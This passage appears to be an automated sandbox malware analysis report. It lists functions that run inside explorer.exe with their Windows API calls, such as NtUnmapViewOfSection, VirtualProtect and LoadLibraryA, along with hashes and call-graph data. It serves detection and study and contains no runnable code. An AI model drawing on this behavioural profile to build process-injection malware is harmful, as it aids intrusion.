                                                                        • Opcode Fuzzy Hash: 3e2004b269e34dd4ee121584ab11494cfe91102d731b6eefacc3be41cfe4b7fb
                                                                        • Instruction Fuzzy Hash: DC31C0B5706203ABEF5CCF29C886B66B7E8BF05304B08456EE886C7200D735E845DBA0
                                                                        Function 0309182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(0309582C), ref: 03091839
                                                                        • lstrlenW.KERNEL32 ref: 03091845
                                                                        • RtlLeaveCriticalSection.NTDLL(0309582C), ref: 030918A9
                                                                        • Sleep.KERNEL32(00007530), ref: 030918B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                        • String ID:
                                                                        • API String ID: 2134730579-0
                                                                        • Opcode ID: 8f33614fa95ee3bbbb64c44a8e766dc90e1bf5f69030a41d7ad154ed54c19018
                                                                        • Instruction ID: b7227fafe131f7044991235c2b1989dc6fbd57f560e54af07a5585bb8a26fede
                                                                        • Opcode Fuzzy Hash: 8f33614fa95ee3bbbb64c44a8e766dc90e1bf5f69030a41d7ad154ed54c19018
                                                                        • Instruction Fuzzy Hash: 6A01A734617604BBEB15F766EC5956F3AADFBC2740305005BE0418B254DA388C01FBA1
                                                                        Function 030926C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,030911DD), ref: 030926DB
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 030926ED
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 03092700
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092716
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 331459951-0
                                                                        • Opcode ID: 31f4c48a692d2eed1591d0f7e6930b12bf7dab81f0fb629497924f075c97ab93
                                                                        • Instruction ID: e62bad9f902f708453b8cfa553e71e07c457c1baa0e6aa96a339332faefbf8d3
                                                                        • Opcode Fuzzy Hash: 31f4c48a692d2eed1591d0f7e6930b12bf7dab81f0fb629497924f075c97ab93
                                                                        • Instruction Fuzzy Hash: 7AF0907980721CFFAB10DFA09D888AFF7BCEE05251B1402ABE901A3140D7344E00AAA0
                                                                        Function 030917DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 030917F3
                                                                        • wsprintfW.USER32 ref: 0309181D
                                                                        Strings
                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 03091817
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                        • API String ID: 377395780-613334611
                                                                        • Opcode ID: 7b99a3f8581092cf624b46e222b6a679a6ac966fc59eba5190e8b1a763feb5ab
                                                                        • Instruction ID: 1e0036d50191c61bfc0e59d3590835af4bd816d5deb800ebd322184157dffec5
                                                                        • Opcode Fuzzy Hash: 7b99a3f8581092cf624b46e222b6a679a6ac966fc59eba5190e8b1a763feb5ab
                                                                        • Instruction Fuzzy Hash: 97F03066901128BADB14ABDE9C058FFB3FCEB0CB02B00018BFA95E1180E67C5950D7B5

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_0062AFE3 1 Function_00621860 11 Function_00621C6C 1->11 2 Function_00621560 3 Function_00622664 4 Function_0062ADEA 5 Function_0062B46A 6 Function_0062A8E8 7 Function_00623068 7->1 7->11 46 Function_00622E2C 7->46 51 Function_00621938 7->51 52 Function_00621838 7->52 8 Function_006218E8 9 Function_00622768 40 Function_006227A0 9->40 10 Function_0062156C 12 Function_0062AFF6 13 Function_00621576 14 Function_006220F4 14->1 18 Function_006218F8 14->18 29 Function_006218D0 14->29 38 Function_00621FDC 14->38 45 Function_006220AC 14->45 14->52 54 Function_006219BC 14->54 71 Function_0062188C 14->71 72 Function_00621F0C 14->72 15 Function_00621EFA 16 Function_00621EF8 17 Function_006226F8 17->3 17->11 59 Function_00622580 17->59 19 Function_00621BF8 20 Function_006214F9 21 Function_00625579 22 Function_00622DC0 22->52 23 Function_006227C4 24 Function_006234C4 24->1 24->11 24->19 27 Function_00621C4C 24->27 41 Function_00621D24 24->41 44 Function_00621CAC 24->44 24->52 24->54 63 Function_00621D04 24->63 64 Function_00622A04 24->64 67 Function_00621A88 24->67 78 Function_00623394 24->78 25 Function_0062B148 26 Function_0062ABCF 28 Function_0062AAD2 30 Function_0062ABD7 31 Function_00621254 32 Function_006214D4 33 Function_00621D54 34 Function_0062B15B 35 Function_0062B358 42 Function_0062B4A8 35->42 36 Function_00623158 37 Function_0062B2DF 38->18 38->52 39 Function_00621822 42->5 43 Function_006225A8 43->9 43->29 43->59 45->67 46->1 46->22 46->71 47 Function_006231AC 47->1 47->17 47->33 47->43 47->52 74 Function_00621B10 47->74 48 Function_006214B2 49 Function_0062AAB0 50 Function_006224B8 50->1 50->14 50->52 51->1 51->52 53 Function_0062B2BE 53->42 55 Function_00622FBC 55->46 56 Function_00621F00 57 Function_0062AD00 58 Function_00621000 60 Function_0062A881 61 Function_00624001 62 Function_0062B007 64->11 64->23 79 Function_00622918 64->79 65 Function_00621405 66 Function_00621508 68 Function_00625289 69 Function_0062C00C 70 Function_0062370C 70->11 70->24 70->47 70->52 70->70 71->52 73 Function_0062AC8D 75 Function_0062B291 76 Function_00624817 77 Function_00622D14 77->1 77->8 77->50 77->52 82 Function_00621E1C 77->82 78->1 78->8 78->16 78->29 78->52 78->67 81 Function_00621E9C 78->81 80 Function_0062AB9C 82->52 83 Function_0062141D

                                                                        Executed Functions

                                                                        Function 0062370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 116 62370c-62371c call 621c6c 119 623722-623754 call 621838 116->119 120 6237b0-6237b5 116->120 124 623756-62375b call 621838 119->124 125 623785-6237aa NtUnmapViewOfSection 119->125 127 623760-623779 124->127 129 6237bc-6237cb call 6234c4 125->129 130 6237ac-6237ae 125->130 127->125 136 6237d5-6237de 129->136 137 6237cd-6237d0 call 62370c 129->137 130->120 131 6237b6-6237bb call 6231ac 130->131 131->129 137->136
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 0062378C
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                        • Instruction ID: 0e225eee23b335dada8c34161d5d26838191a57c19187175ce99dd63b5d1ee95
                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                        • Instruction Fuzzy Hash: 79119374601D294BEF58FB78A89D2B533D3E754312F54402DA815CB3A2DF3D8A858B08
                                                                        Function 0062B4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 62b4a8-62b4ab 1 62b4b5-62b4b9 0->1 2 62b4c5 1->2 3 62b4bb-62b4c3 1->3 4 62b4c7 2->4 5 62b4ad-62b4b3 2->5 3->2 6 62b4ca-62b4d1 4->6 5->1 8 62b4d3-62b4db 6->8 9 62b4dd 6->9 8->9 9->6 10 62b4df-62b4e2 9->10 11 62b4f7-62b504 10->11 12 62b4e4-62b4f2 10->12 24 62b506-62b508 11->24 25 62b51e-62b52c call 62b46a 11->25 13 62b4f4-62b4f5 12->13 14 62b52e-62b549 12->14 13->11 15 62b57a-62b57d 14->15 17 62b582-62b589 15->17 18 62b57f-62b580 15->18 19 62b58f-62b593 17->19 21 62b561-62b565 18->21 22 62b5f0-62b5f9 19->22 23 62b595-62b5ae LoadLibraryA 19->23 26 62b567-62b56a 21->26 27 62b54b-62b54e 21->27 33 62b5fc-62b605 22->33 29 62b5af-62b5b6 23->29 31 62b50b-62b512 24->31 25->1 26->17 32 62b56c-62b570 26->32 27->17 30 62b550 27->30 29->19 35 62b5b8 29->35 36 62b551-62b555 30->36 50 62b514-62b51a 31->50 51 62b51c 31->51 32->36 37 62b572-62b579 32->37 38 62b607-62b609 33->38 39 62b62a-62b67a VirtualProtect * 2 33->39 41 62b5c4-62b5cc 35->41 42 62b5ba-62b5c2 35->42 36->21 43 62b557-62b559 36->43 37->15 45 62b60b-62b61a 38->45 46 62b61c-62b628 38->46 40 62b67e-62b683 39->40 40->40 47 62b685-62b694 40->47 48 62b5ce-62b5da 41->48 42->48 43->21 49 62b55b-62b55f 43->49 45->33 46->45 54 62b5e5-62b5ef 48->54 55 62b5dc-62b5e3 48->55 49->21 49->26 50->51 51->25 51->31 55->29
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0062B5A7
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0062B651
                                                                        • VirtualProtect.KERNELBASE ref: 0062B66F
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.000000000062A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0062A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_62a000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                        • Instruction ID: a433d342c0d41108eb40e56c0b469c3cee1f94dc0596d5370a39c7133ce11e89
                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                        • Instruction Fuzzy Hash: 8C517B31754D3E4BCB24AE78BCC42F4B7D3F755325B18166AC49ACB385E758C8868B81
                                                                        Function 006234C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00621BF8: OpenFileMappingA.KERNEL32 ref: 00621C0F
                                                                          • Part of subcall function 00621BF8: MapViewOfFile.KERNELBASE ref: 00621C2E
                                                                        • SysFreeMap.PGOCR ref: 006236F7
                                                                        • SleepEx.KERNELBASE ref: 00623701
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                        • String ID:
                                                                        • API String ID: 4205437007-0
                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                        • Instruction ID: cf9c9c703a93b49925208f26c190c97b050b6cfea26fbca33a97b82f934907c7
                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                        • Instruction Fuzzy Hash: 38519730208E284FDB59FB24E8996EA7397EBA5310F44461DE457C73A1DF38D6058B85
                                                                        Function 00621BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 113 621bf8-621c18 OpenFileMappingA 114 621c1a-621c38 MapViewOfFile 113->114 115 621c3b-621c48 113->115 114->115
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$MappingOpenView
                                                                        • String ID:
                                                                        • API String ID: 3439327939-0
                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                        • Instruction ID: 7e864cbc68533d615d0ff4466237fabe915e5faecd6b2bba141795472722c220
                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                        • Instruction Fuzzy Hash: 31F08234318F0D4FAB44EF7C9C9C135B7E1EBA8202700857A984AC6264EF34C8418701